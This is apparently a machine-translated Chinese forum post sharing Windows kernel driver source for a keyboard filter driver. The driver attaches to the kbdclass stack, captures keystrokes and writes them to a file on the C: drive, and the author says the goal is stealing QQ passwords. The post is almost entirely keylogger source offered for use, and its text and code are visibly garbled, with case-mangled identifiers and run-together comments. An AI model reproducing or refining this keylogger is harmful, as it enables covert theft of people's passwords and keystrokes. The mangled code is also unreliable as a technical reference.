Cold River Alone Fishing keyboard filter, modified under, filter QQ password write buff, there is a carriage return or buff full write file, because the IRP is complete, the IRP corresponds to the memory of the fast recovery, so with the global buffer. Open a thread to write, and began to use the team example of a processing IRP, but found that relatively slow, have to do so. Create a process callback code add a few lines, this is not written, because the code is missing, is a kind of approximate code it. For beginners to share under. Wrong point, thank you.
Seniors, don't laughed at.
Struct.h
/************************************///author:duanyueming//data:02/05/2015//file:lstruct.h/****************** /#ifndef _lstruct_h_#define _lstruct_h_typedef struct _device_extension {pdevice_object pdeviceobj ; Pdevice_object Pattachdev; Upper equipment Pdevice_object Plowdevice; Bottom equipment Pdevice_object pstoragedev; The stored device pdevice_object Ptardevice; Target device unicode_string Mydevicename; Unicode_string Mydevicesym; ULONG Pmydevflg;io_remove_lock Movelock;} device_extension,*pdevice_extension;typedef struct _multvar{ PVOID pbuff; KEVENT waitevent; ULONG Length;} Multvar,*pmultvar; #define buff_size 256typedef struct _my_buff{puchar pbuf;int maxsize;int cursize;int Offset;} mybuff,*pmybuff;typedef struct _my_data{ pirp Irp; PVOID Pbuff; List_entry ListEntry;} My_data,*pmydata;
#define mydeviceflags ' LUNA ' #define mycdodeviceflags ' LCDO ' #define removetag ' lmn ' #define Delay_ One_microsecond ( -10) #define Delay_one_millisecond (delay_one_microsecond*1000) #define Delay_one_second (delay_one_millisecond*1000) #define IS_MY_DEVICE_OBJECT (_obj) (((pdevice_extension) _obj->deviceextension)->pmydevflg = = Mycdodeviceflags | | Pdevice_extension (_obj->deviceextension)->PMYDEVFLG = = mydeviceflags) #define Is_my_control_device (_obj) (((pdevice_extension) _obj->deviceextension)->pmydevflg = = mycdodeviceflags)
/******** not archived function ************/ntstatusobreferenceobjectbyname (punicode_string objectname,ulong Attributes,PACCESS_ State accessstate,access_mask Desiredaccess,pobject_type Objecttype,kprocessor_mode AccessMode,PVOID ParseContext, PVOID *object); extern pobject_type *iodriverobjecttype;
NTSTATUS lqueryobjectname (PVOID lobject,punicode_string name)//query file name {NTSTATUS status; Pobject_name_information Pbuff; WCHAR cache[64]; ULONG Needlength;pbuff = (pobject_name_information) cache;status = obquerynamestring (lobject,pbuff,64*sizeof (WCHAR), &needlength), if (status = = Status_info_length_mismatch) {Pbuff = (pobject_name_information) ExAllocatePool ( Nonpagedpool,needlength); if (Pbuff = = NULL) {return status_insufficient_resources;} RtlZeroMemory (pbuff,needlength); status = Obquerynamestring (Lobject,pbuff,needlength,&needlength);} name->length = 0; Rtlcopyunicodestring (name,&pbuff->name); return status;} VOID luninstalldriver (Pdriver_object pdriverobject) {pdevice_extension pdevext; Prkthread CurrentThread; Large_integer time; Pdevice_object pdevobj;time = Rtlconvertlongtolargeinteger (100*delay_one_second);pD evobj = pDriverObject-> DeviceObject; CurrentThread = Kegetcurrentthread (); Kesetprioritythread (currentthread,low_realtime_priority); while (pdevobj) {Pdevext = (pdevice_extension) Pdevobj->deviceextension;iodeletesymboliclink (&pdevext->mydevicesym);pD evobj = pDevObj-> Nextdevice;iodetachdevice (Pdevext->plowdevice); Iodeletedevice (pdevext->pdeviceobj);} while (1) {}kdprint (("Driver UnInstall complete,leave\n");} NTSTATUS ldispatchroutine (pdevice_object pdeviceobject,pirp pirp) {pio_stack_location STACK = Iogetcurrentirpstacklocation (PIRP); ioskipcurrentirpstacklocation (PIRP); return IoCallDriver (((PDEVICE_EXTENSION) pdeviceobject->deviceextension)->plowdevice,pirp);}
The following is the code:
#include "QFilter.h" NTSTATUS driverentry (pdriver_object pdriverobject,punicode_string pregistrypath) {int i; NTSTATUS status; HANDLE thread;/******** initializes global variables ***********/iswritedata = False;isneedfilter = False;initializelisthead (&g_list); G_buff = (pmybuff) exallocatepool (nonpagedpool,sizeof (Mybuff)), if (G_buff ==null) {Kdprint (("No Through memory \ n")); return 0;} Else{g_buff->pbuf = (Puchar) exallocatepool (nonpagedpool,buff_size); ASSERT (g_buff->pbuf); g_buff->maxsize = Buff_size;g_buff->offset = 0;g_buff->cursize = 0;} /******** Initialize global variable ***********/pdriverobject->driverunload = luninstalldriver;for (i = 0;i <irp_mj_maximum_ function;i++) {Pdriverobject->majorfunction[i] = ldispatchroutine;} Pdriverobject->majorfunction[irp_mj_read] = Readroutine;pdriverobject->majorfunction[irp_mj_power] = Powerroutine;pdriverobject->majorfunction[irp_mj_device_control] = contrlroutine;//pdriverobject-> Majorfunction[irp_mj_close] = Closeirp;status = Createmycdodevice (pdriverobjeCT); if (! Nt_success (status) {return status;} Status = Bindkbddriver (Pdriverobject); Nt_success (status) {return status;} Status = Pscreatesystemthread (&thread,generic_all,null,null,null,processirp,null); Nt_success (status) {Kdprint ("Create Thread Failed \ n"); return status;} Kdprint ("Start Kbd Filter successfuly \ n"); return status_success;} VOID processirp (PVOID pContext) {//pmydata data; PVOID buff = NULL; for (;;) {//Plist_entry Headdata = Removeheadlist (&g_list);//data = Containing_record (headdata,my_data,listentry); if (I Swritedata = = true&& G_buff->pbuf! = NULL) {Kdprint (("hehehehe\n")); Kdprint (("111\n")); Kdprint (("2222\n")); Mywritedatafile (); RtlZeroMemory (g_buff->pbuf,g_buff->maxsize); g_buff->cursize = 0;g_buff->offset = 0;} }}ntstatus powerroutine (pdevice_object pdeviceobj,pirp pirp) {postartnextpowerirp (PIRP); Ioskipcurrentirpstacklocation (PIRP); Return Pocalldriver (((pdevice_extension) pdeviceobj->deviceextension)->PLOWDEVICE,PIRP);} NTSTATUS Createmycdodevice (Pdriver_object pdriverobj) {NTSTATUS status; Unicode_string Devsym; Unicode_string Devname; Pdevice_object Pnewdev; Pdevice_extension Pdevext; Rtlinitunicodestring (&devname,l "\\Device\\QFilter"); status = IoCreateDevice (Pdriverobj,sizeof (device_ EXTENSION), &devname,file_device_unknown,0,true,&pnewdev); if (! Nt_success (status) {Kdprint ("Create CDO devobj Failed \ n")); return status;} Rtlinitunicodestring (&devsym,l "\ \?? \\QFilterSym "); Status = Iocreatesymboliclink (&devsym,&devname); Nt_success (status) {Kdprint ("Create Cdo symbolic Failed \ n"); Iodeletedevice (Pnewdev); return status;} Pnewdev->flags |=do_buffered_io;pdevext = (pdevice_extension) PNEWDEV->DEVICEEXTENSION;PDEVEXT->PMYDEVFLG = Mycdodeviceflags;pdevext->mydevicename = Devname;pdevext->pdeviceobj = Pnewdev;pdevext->mydevicesym = Devsym;return status_success;} NTSTATUS bindkbddriver (Pdriver_object pdriverobj) {unicode_string kbdclass; PdeviCe_object Pnewdev; Pdevice_object Ptardev; Pdevice_object Plowdev; Pdevice_extension Pdevext; Pdriver_object Pkbddrob; NTSTATUS status = Status_success; Rtlinitunicodestring (&kbdclass,l "\\Driver\\kbdclass"); status = Obreferenceobjectbyname (&kbdclass,obj_ Case_insensitive,null,0,*iodriverobjecttype,kernelmode,null, (pvoid*) &pkbddrob); Nt_success (status) {Kdprint ("Load kbdobj Failed:%x\n", status); return status;} Obdereferenceobject (pkbddrob);p Tardev = Pkbddrob->deviceobject;while (ptardev) {status = IoCreateDevice ( Pdriverobj,sizeof (device_extension), Null,ptardev->devicetype,ptardev->characteristics,false,&pnewdev ); if (! Nt_success (status) {Kdprint ("Create Device failed:%x\n", status); return status;} Else{status = Ioattachdevicetodevicestacksafe (Pnewdev,ptardev,&plowdev); Nt_success (status) {Kdprint ("Bind Failed \ n"); return status;} Pdevext = (pdevice_extension) pnewdev->deviceextension;pnewdev->flags |= plowdev->flags& (DO_BUFFERED_ IO | Do_direct_io | do_power_pagable);p newdev->flags &= ~do_device_initializing;pdevext->pdeviceobj = pNewDev;pDevExt-> PMYDEVFLG = Mydeviceflags;pdevext->plowdevice = Plowdev;pdevext->pattachdev = PTarDev;pNewDev->StackSize = Pdevext->plowdevice->stacksize+1;//ioinitializeremovelock (&pdevext->movelock,0,0,0);} Ptardev = Ptardev->nextdevice;} Rtlinitunicodestring (&filename,l "\\dosdevices\\c:\\luna.txt"); Kdprint (("Complete Device Bind \ n"); return status_success;} VOID Mywritedatafile () {HANDLE handl;object_attributes objattr;io_status_block BLOCK; NTSTATUS status; Initializeobjectattributes (&objattr,&filename,obj_case_insensitive,null,null); status = ZwCreateFile ( &handl,generic_write,&objattr,&block,null,file_attribute_normal,0,file_open_if,file_synchronous_io _nonalert,null,0); if (! Nt_success (status) {Kdprint ("Create File Storage data failed:%x", status); return;} Status = Zwwritefile (handl,null,null,null,&block,g_buff->pbuf,g_Buff->cursize,0,null); if (! Nt_success (status) {Kdprint ("WriteFile failed:%x \ n", status)); Zwclose (Handl); return;} Kdprint (("Code:%c \ n", g_buff->pbuf)); Zwclose (Handl);} NTSTATUS Readcompletefun (pdevice_object pdeviceobj,pirp pirp,pvoid pContext) {ULONG keystructnum; Pkeyboard_input_data ptr; ULONG i; UCHAR asciicode;if (/*isneedfilter &&*/nt_success (pirp->iostatus.status)) {keystructnum = pIrp-> iostatus.information/(pirp->iostatus.information/sizeof (keyboard_input_data)); ptr = (pkeyboard_input_data) pirp->associatedirp.systembuffer; for (i =0; I <keystructnum;++i) {Asciicode = Print_keystroke (Ptr[i]. Makecode); if (G_buff->offset >= (buff_size-(5*ucharsize)) | | Asciicode = = ' 0x0D ') {kdprint ("Steup Write Data!!!!!!!!!!!!!!!!!!! \ n ")); Iswritedata =true; Rtlcopymemory (((G_BUFF->PBUF) + (G_buff->offset)), &asciicode,ucharsize); G_buff->offset + = Ucharsize; G_buff->cursize +=ucharsize; } else {IsWrItedata =false; Kdprint (("------Buff small---Start Write Data to file--\ n")); }}} if (pirp->pendingreturned) {iomarkirppending (PIRP); }return Pirp->iostatus.status;} NTSTATUS readroutine (pdevice_object pdeviceobj,pirp pirp) {pio_stack_location STACK; NTSTATUS status = Status_success; if (pirp->currentlocation ==1) {pirp->iostatus.status = Status_invalid_device_request; pirp->iostatus.information = 0; IoCompleteRequest (pirp,io_no_increment); return status_invalid_device_request; } if (Is_my_control_device (pdeviceobj)) {pirp->iostatus.status = status_success; pirp->iostatus.information = 0; IoCompleteRequest (pirp,io_no_increment); return status_success; } stack = Iogetcurrentirpstacklocation (PIRP); Iocopycurrentirpstacklocationtonext (PIRP); Iosetcompletionroutine (pirp,readcompletefun,null,true,true,true); Return IoCallDriver (((pdevice_extension) pdeviceobj->deviceextension)->plowdevice,pirp);} NTSTATUSContrlroutine (pdevice_object pdeviceobj,pirp pirp) {pio_stack_location STACK = iogetcurrentirpstacklocation (PIRP); if (Is_my_control_device (Pdeviceobj)) {switch (Stack->parameters.deviceiocontrol.iocontrolcode) {}}switch (stack-> Parameters.DeviceIoControl.IoControlCode) {default:ioskipcurrentirpstacklocation (PIRP); Return IoCallDriver (((pdevice_extension) pdeviceobj->deviceextension)->plowdevice,pirp);}}
Windows Driver Filter--kdbclass filter, Cold river alone fishing enhanced version